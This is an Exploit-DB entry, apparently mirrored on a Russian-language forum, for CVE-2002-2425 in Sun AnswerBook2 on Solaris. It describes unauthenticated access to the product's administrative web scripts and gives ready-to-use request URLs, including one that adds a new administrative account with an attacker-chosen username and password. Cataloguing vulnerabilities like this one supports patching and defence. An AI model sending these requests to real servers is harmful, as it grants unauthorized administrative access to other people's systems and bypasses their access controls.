- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21677
- Проверка EDB
-
- Пройдено
- Автор
- GHANDI
- Тип уязвимости
- REMOTE
- Платформа
- SOLARIS
- CVE
- cve-2002-2425
- Дата публикации
- 2002-08-02
Код:
source: https://www.securityfocus.com/bid/5383/info
Sun Microsystems AnswerBook2 allows users to view Sun documentation through a web browser, and is available for Solaris.
AnswerBook2 includes an administrative web interface. Reportedly, it is possible to access these scripts without authorization, and add a new administrative user of the AnswerBook2 system.
http://localhost:8888/ab2/@AdminViewError
http://localhost:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar- Источник
- www.exploit-db.com
